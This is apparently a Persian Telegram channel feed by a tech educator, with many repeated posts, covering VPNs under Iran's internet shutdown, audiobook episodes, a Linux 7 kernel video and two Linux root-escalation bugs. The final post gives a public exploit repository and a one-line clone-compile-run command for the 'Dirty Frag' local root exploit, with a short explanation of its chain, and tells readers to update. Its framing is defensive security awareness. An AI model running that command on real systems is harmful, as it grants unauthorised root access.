پوف... بعد از چند سال بالاخره قسمت آخر ویدئوی درک مقدماتی شبکه با جادی رو درست کردم چون فکر کردم چیزی است که الان هم دیده نشه مهم نیست و هر وقت کسانی که می خوان ببینن به اینترنت وصل شدن می تونن نگاهش کنن. حالا که در بدترین دوران اینترنت تاریخ ایران هستیم بیاین ببینیم وی پی ان چیه، چطوری کار می کنه و چرا باعث می شه ما توی یه کشور دیگه به نظر بیایم.
https://youtu.be/1d0P38x2eMA
با امید دسترسی همه مون به اینترنت و آزادی.
https://youtu.be/1d0P38x2eMA
با امید دسترسی همه مون به اینترنت و آزادی.
YouTube
درک مقدماتی شبکه جادی - قسمت ۱۴ - وی پی ان ها
بعد از چند سال در شدیدترین سرکوب اینترنتی ایران اومدم که با هم در مورد وی پی ان ها یاد بگیریم! درکی از اینکه چی هستن و چرا درست شدن. متاسفانه سانسور اینترنت در ایران تقریبا به خاموشی مطلق رسیده و سنگین تر از اون است که با این درس بشه ازش رد شد ولی یاد گرفتن…
7❤349👍27👎13🗿9🙏8😭5🔥4🕊3🥰2🍓2🤓1
راستش من این دوران کم نوشته ام. هم احساس می کنم حرف به اندازه کافی هست و هم تاثیر حرف های ما در اتفاقات بسیار کمه ولی مهمتر از همه اینها، مخاطب های اصلی من که تو ایران هستن دسترسی بسیار پایینی دارن و بدون شما بخش عظیمی از این حرفها بی معنی است. در نتیجه منم سعی کردم چیزهایی درست کنم که اولا زمان مشخصی برای دیدن نداشته باشن و قدیمی نشن و ثانیا قابل دست به دست شدن باشن.
اما حالا که حرف از گفتگو و مذاکره آمریکا و اسراییل و جمهوری اسلامی است، حداقل انتظار اینه که در ادامه «زیر ساخت ها مهم هستن و نباید بلایی سرشون بیاد» یادشون هم باشه که اینترنت هم زیر ساخت است و بستنش روی مردم چیزی شبیه جنایت.
اما حالا که حرف از گفتگو و مذاکره آمریکا و اسراییل و جمهوری اسلامی است، حداقل انتظار اینه که در ادامه «زیر ساخت ها مهم هستن و نباید بلایی سرشون بیاد» یادشون هم باشه که اینترنت هم زیر ساخت است و بستنش روی مردم چیزی شبیه جنایت.
13❤1.32K🍌279👍172👌51🤡29❤🔥13💯8💅7🍓4🦄3🥰1
کتاب صوتی #برای_پیروزی قسمت ۱۷ و ۱۸ و ۱۹.
حتی اگر کتاب رو گوش ندادین قسمت ۱۷ توصیه می شه. کتاب در مورد بازیکنانی است که توی بازی های کامپیوتری دنبال طلا و اشیاء گرون می گردن و اونو به بقیه می فروشن. معمولا رییسی دارن و اونم رییسی و تلاش می کنن اتحادیه تشکیل بدن ولی سرکوب می شن. اما قسمت ۱۷ و ۱۸ کتاب گریزی می زنه به پشت صحنه ها . اینکه بازی ها چطوری می چرخن . قسمت ۱۷ مفاهیمی رو بررسی می کنه که در همه زندگی و همه تحلیل ها به دردتون می خوره، حتی اینکه چرا اینترنت در ایران فیلتر می شه!
این فایل ها رو تا حد ممکن کوچیک کردم که قابل دانلود باشه و خیلی هم خوشحال می شم هر طور که دوست دارین به هر کس دیگه بدینشون (منطقا با قسمت های قبلی و بعدی البته (: ))
لینک کتاب برای پیروزی از کوری دکترو روی یوتیوب: https://www.youtube.com/playlist?list=PL-tKrPVkKKE30wABmmy04afxwObHcMjAK
حتی اگر کتاب رو گوش ندادین قسمت ۱۷ توصیه می شه. کتاب در مورد بازیکنانی است که توی بازی های کامپیوتری دنبال طلا و اشیاء گرون می گردن و اونو به بقیه می فروشن. معمولا رییسی دارن و اونم رییسی و تلاش می کنن اتحادیه تشکیل بدن ولی سرکوب می شن. اما قسمت ۱۷ و ۱۸ کتاب گریزی می زنه به پشت صحنه ها . اینکه بازی ها چطوری می چرخن . قسمت ۱۷ مفاهیمی رو بررسی می کنه که در همه زندگی و همه تحلیل ها به دردتون می خوره، حتی اینکه چرا اینترنت در ایران فیلتر می شه!
این فایل ها رو تا حد ممکن کوچیک کردم که قابل دانلود باشه و خیلی هم خوشحال می شم هر طور که دوست دارین به هر کس دیگه بدینشون (منطقا با قسمت های قبلی و بعدی البته (: ))
لینک کتاب برای پیروزی از کوری دکترو روی یوتیوب: https://www.youtube.com/playlist?list=PL-tKrPVkKKE30wABmmy04afxwObHcMjAK
7❤194🔥13👍11👎10💩8🙏3🤓3😁2🖕2🐳1
خب به نظر می رسه تعداد بیشتری از آدم ها در ایران امروز به اینترنت رسیدن. هم قیمت وی پی ان های مبتنی بر استارلینک تا حدی پایینتر اومده و هم چند تا رنج آی پی جدید باز شده (که حدس می زن مرتبط باشه با اینترنت دادن به خودی هاشون) و هم تونل های SNI دارن بیشتر استفاده می شن. بازم به امید روزی که این حرف ها رو اصلا نفهمیم و اینترنت برامون یه چیزی باشه که با وصل شدن به وای فای یا روشن کردن ۵جی راه می افته و اکثریت ایرانی ها نه لازمه بدونن دی ان اس چیه نه اسپوفینگ.
اگر می خواین سعی کنین برای اطرافیان راه بندازین،
SNI-Spoofing
و ده ها پروژه ای که روی گیت هاب هست رو سرچ کنین. متاسفانه (و همزمان خوشبختانه) به خاطر هوش مصنوعی دیگه معلوم نیست کد اصلی کدوم بوده و اینها و همه رو هم سوار می شن و تند تند کد و اسکریپت میاد که منم نمی دونم الان دقیقا کدومش راحتترین است. ولی تست کردنش سخت نیست.
و تکرار می کنم که این راه حل ها موقت و محدود است. روش عمومی ای نیست که همه باهاش وصل بشیم. با دردسر چند نفری رو می تونین وصل کنین باهاش.
اگر می خواین سعی کنین برای اطرافیان راه بندازین،
SNI-Spoofing
و ده ها پروژه ای که روی گیت هاب هست رو سرچ کنین. متاسفانه (و همزمان خوشبختانه) به خاطر هوش مصنوعی دیگه معلوم نیست کد اصلی کدوم بوده و اینها و همه رو هم سوار می شن و تند تند کد و اسکریپت میاد که منم نمی دونم الان دقیقا کدومش راحتترین است. ولی تست کردنش سخت نیست.
و تکرار می کنم که این راه حل ها موقت و محدود است. روش عمومی ای نیست که همه باهاش وصل بشیم. با دردسر چند نفری رو می تونین وصل کنین باهاش.
13❤682👎70👍55💩18❤🔥12😢6👾6🕊5🍾4🤡3🙏1
روزهای بدی است ولی باید تلاش کرد و پیش رفت. راستش اخبار به شیوه کلاسیک رادیو جادی به نظرم بی معنی میاد چون اکثر مخاطبین که تو ایران هستن بهش نمی رسن و وقتی هم برسن خبر قدیمی دیدن خیلی جالب نیست و دیدن اینکه اومده ولی نمی تونن ببینن هم رنج رو بیشتر می کنه.
در نتیجه سعی می کنم چیزهایی درست کنم که زمان مشخصی ندارن و هر وقت کسی به اینترنت رسید بتونه نگاهش کنه و «دیر» نشده باشه چندان؛ حتی اگر در مورد اخبار روز باشه.
توی این ویدئو در مورد لینوکس کرنل جدید حرف می زنیم که عدد اصلی نسخه اش عوض شده. یکی دو روز قبل لینوکس نسخه ۷ ریلیز شد که خب از نظر عددی اتفاق بزرگی است. بیاین ببینیم توش چی داره و بعدش کامپایلش کنیم و روی توزیعمون نصبش کنیم و آزادی رو آرزو کنیم.
برای کسانی که نمی تونن ببینین بگم که دو سه تا چیز در این هسته جدید جذابتره:
- یه الگوریتم مقاوم در برابر کوانتوم که قراره کم کم برای امضای ماجولها جایگزین الگوریتم های قبلی بشه
- بیرون اومدن راست از وضعیت آزمایشی و پایدار شدنش در هسته برای توسعه ماجولها و بخش های دیگه
- پیشرفت ها توی BFP بخصوص توی io_uring . این روزها BFP روشی مدرن است برای دیباگ کردن کرنل، دیدن اجرای برنامه ها، بررسی بدافزارها و کلی چیز دیگه
https://youtu.be/n_OGYdpKZbo
در نتیجه سعی می کنم چیزهایی درست کنم که زمان مشخصی ندارن و هر وقت کسی به اینترنت رسید بتونه نگاهش کنه و «دیر» نشده باشه چندان؛ حتی اگر در مورد اخبار روز باشه.
توی این ویدئو در مورد لینوکس کرنل جدید حرف می زنیم که عدد اصلی نسخه اش عوض شده. یکی دو روز قبل لینوکس نسخه ۷ ریلیز شد که خب از نظر عددی اتفاق بزرگی است. بیاین ببینیم توش چی داره و بعدش کامپایلش کنیم و روی توزیعمون نصبش کنیم و آزادی رو آرزو کنیم.
برای کسانی که نمی تونن ببینین بگم که دو سه تا چیز در این هسته جدید جذابتره:
- یه الگوریتم مقاوم در برابر کوانتوم که قراره کم کم برای امضای ماجولها جایگزین الگوریتم های قبلی بشه
- بیرون اومدن راست از وضعیت آزمایشی و پایدار شدنش در هسته برای توسعه ماجولها و بخش های دیگه
- پیشرفت ها توی BFP بخصوص توی io_uring . این روزها BFP روشی مدرن است برای دیباگ کردن کرنل، دیدن اجرای برنامه ها، بررسی بدافزارها و کلی چیز دیگه
https://youtu.be/n_OGYdpKZbo
YouTube
بالاخره لینوکس نسخه ۷ اومد؛ بیاین ویژگی هاش رو ببینیم و رو توزیعمون نصبش کنیم
نکته مهم: اگر فدورا روی کامپیوتر اصلی است باید بسیار احتیاط کنین در اینکارها. اگر واقعا علاقمند به تغییر واقعی کرنل هستین روش بهتر استفاده از fedpkg است.
کم پیش میاد که عدد اصلی کرنل لینوکس بالا بره ولی بالاخره توروالدز تصمیم گرفت که از نسخه ۶.۱۹ به نسخه…
کم پیش میاد که عدد اصلی کرنل لینوکس بالا بره ولی بالاخره توروالدز تصمیم گرفت که از نسخه ۶.۱۹ به نسخه…
9❤449👍52👎23💩15😢12❤🔥8🍌6🕊5💘1
دو قسمت کوتاه دیگه از #برای_پیروزی . نگاهی می ندازیم به وضعیت لئونارد مشهور به وی-دونگ و خواهربزرگ نور و دوستاش. سریع و موثر (:
2❤222👎29💩18👍16🤡6🕊3💔2🤷2😍1👨💻1
Audio
در سه قسمت بعدی #برای_پیروزی ماجراهای آدم ها رو دنبال می کنیم. از جلمه لئونارد که سعی می کنه از آمریکا خودش رو به چین برسونه و متیو که حالا از زندان چین آزاد شده و دوستش میاد سراغش. در قسمت ۲۴ گپ و گفت های خودم زیاده و می بینین چقدر همه چیز شبیه چیزهای اطراف ما است (:
11❤167👎27💩12👍10🕊4🥰2🍓2👏1
با ذکر بد بودن اینترنت طبقاتی و سانسور و جنگ و ابراز امید برای رسیدن به آزادی و حق انتخاب و مشارکت مردم در سرنوشت، باید بگم که مطلقا هر لینوکسی که دارین رو آپدیت کنین. با این copy.fail می شه روی بسیاری از لینوکس های آپدیت نشده، با یوزر لوکال دسترسی روت گرفت.
55❤393😱84👍48🤔16💔8🙏7😁5🕊5👨💻4🥰3👌2
جادی | Jadi
با ذکر بد بودن اینترنت طبقاتی و سانسور و جنگ و ابراز امید برای رسیدن به آزادی و حق انتخاب و مشارکت مردم در سرنوشت، باید بگم که مطلقا هر لینوکسی که دارین رو آپدیت کنین. با این copy.fail می شه روی بسیاری از لینوکس های آپدیت نشده، با یوزر لوکال دسترسی روت گرفت.
این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله ای درست کرد!
https://youtu.be/0GUEoWEDqlo
https://youtu.be/0GUEoWEDqlo
YouTube
نوشتن ۴ بایت روی فایلهای سیستمی که امنیت کرنل لینوکس رو در هم کوبید - توضیح فنی Copy Fail
درسته که من لینوکس رو خیلی دوست دارم ولی وقتی باگ های حاد داره بهترین وقت است برای یه گپ فنی عمیق. چند روز قبل یه باگ لوکال منتشر شد که هر یوزری با داشتن دستوری حداقلی می تونست خودش رو به روت تبدیل کنه. این مشکل ناشی از «یک باگ» نبود بلکه محصول وصل کردن سه…
3❤219👍28👾12😭4😐3🤓3❤🔥2🔥2🥰2🤯2👏1
یه ویدئو گذاشتم و استقبال اینقدر زیاد بود که بر داشتم (: دلیلش این بود که می تونه موجب بسته شدنش بشه یکهو هزار تا فورک و اجرا کردن کد اسپیس. من معمولا به همین خاطر خیلی مستقیم اینجا روشی رو معرفی نمی کنم که ظاهرا استراتژی معقولی بوده. حالا یه فکری می کنم که به کسانی که نرسیده خرد خرد برسه.
و عمیقا به امید روزی که اینهمه آدم معطل این نباشیم که چطوری باید به اینترنتی برسیم که تو دنیای معقول، هر کس از خواب بیدار می شه بی دردسر بهش دسترسی داره.
و عمیقا به امید روزی که اینهمه آدم معطل این نباشیم که چطوری باید به اینترنتی برسیم که تو دنیای معقول، هر کس از خواب بیدار می شه بی دردسر بهش دسترسی داره.
13❤929😢246👍91👎61💩19❤🔥7😁7👏6🤬4🙏4🤝3
دوباره یه مشکل امنیتی حاد در کرنل لینوکس داریم که باهاش هر یوزر لوکال می تونه دسترسی روت بگیره. بهش می گن درتی فرگ.
رپوزیتوری اینجاست:
https://github.com/V4bel/dirtyfrag
و دستوری که دسترسی می ده اینه:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:
https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت
رپوزیتوری اینجاست:
https://github.com/V4bel/dirtyfrag
و دستوری که دسترسی می ده اینه:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:
https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت
GitHub
GitHub - V4bel/dirtyfrag
Contribute to V4bel/dirtyfrag development by creating an account on GitHub.
1👍139❤82😁15🥴12💔6🔥4🙏3👏2😢2✍1🥰1